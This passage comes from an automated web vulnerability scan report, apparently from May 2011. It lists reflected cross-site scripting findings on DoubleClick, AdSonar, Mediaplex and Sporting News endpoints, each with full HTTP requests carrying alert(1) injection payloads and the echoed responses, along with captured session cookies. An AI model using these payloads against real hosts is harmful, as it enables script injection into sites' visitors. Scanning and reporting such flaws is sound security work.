The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20afb'-alert(1)-'1fde27dc36e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/huffpost.premium/front;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418%7Chomepage%7Cpushdown%7C%7C%7C%7C%7C%7C%7C%7C;sz=970x418;tile=1;ord=18505141?&20afb'-alert(1)-'1fde27dc36e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 05 May 2011 00:59:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 495

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afe/0/0/%2a/g;44306;0-0;0;19141241;31519-970/418;0/0/0;u=970x418|homepage|pushdown||||||||;~okv=;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown||||||||;sz=970x418;tile=1;;20afb'-alert(1)-'1fde27dc36e=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 2b6fc<script>alert(1)</script>6725a804ac9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=19907672b6fc<script>alert(1)</script>6725a804ac9&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "19907672b6fc<script>alert(1)</script>6725a804ac9"

   
                                                           </head>
...[SNIP]...

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1fb20--><script>alert(1)</script>e17c77c9e55 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056911fb20--><script>alert(1)</script>e17c77c9e55&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3306


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056911fb20--><script>alert(1)</script>e17c77c9e55" -->
...[SNIP]...

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4192a--><script>alert(1)</script>fc1a324ec2a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-14192a--><script>alert(1)</script>fc1a324ec2a&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3745


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14192a--><script>alert(1)</script>fc1a324ec2a" -->
   
...[SNIP]...

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d70'-alert(1)-'9add617d7d3 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3">
...[SNIP]...

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cce6'%3balert(1)//bd0628ff781 was submitted in the mpvc parameter. This input was echoed as 1cce6';alert(1)//bd0628ff781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6'%3balert(1)//bd0628ff781 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:25 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6';alert(1)//bd0628ff781http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77daa'%3balert(1)//71eb06d6eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77daa';alert(1)//71eb06d6eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa'%3balert(1)//71eb06d6eab=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:34:24 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 420
Date: Thu, 05 May 2011 01:00:26 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa';alert(1)//71eb06d6eab=1http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a09e'-alert(1)-'fb0851aaf65 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:17:54 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 631
Date: Thu, 05 May 2011 01:00:19 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...
52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65">
...[SNIP]...

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9d9'%3balert(1)//9b1f5b87858 was submitted in the mpvc parameter. This input was echoed as 3e9d9';alert(1)//9b1f5b87858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9'%3balert(1)//9b1f5b87858 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:34:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 630
Date: Thu, 05 May 2011 01:00:21 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9';alert(1)//9b1f5b87858http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41e2'%3balert(1)//ab4d8722cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e2';alert(1)//ab4d8722cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2'%3balert(1)//ab4d8722cb9=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:39:09 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 633
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2';alert(1)//ab4d8722cb9=1http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16ea"><script>alert(1)</script>3359d04778d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f16ea"><script>alert(1)</script>3359d04778d=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044482-New%7C1367647044482%3B%20s_nrgvo%3DNew%7C1367647044484%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_cc=true; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105579

<!DOCTYPE html>

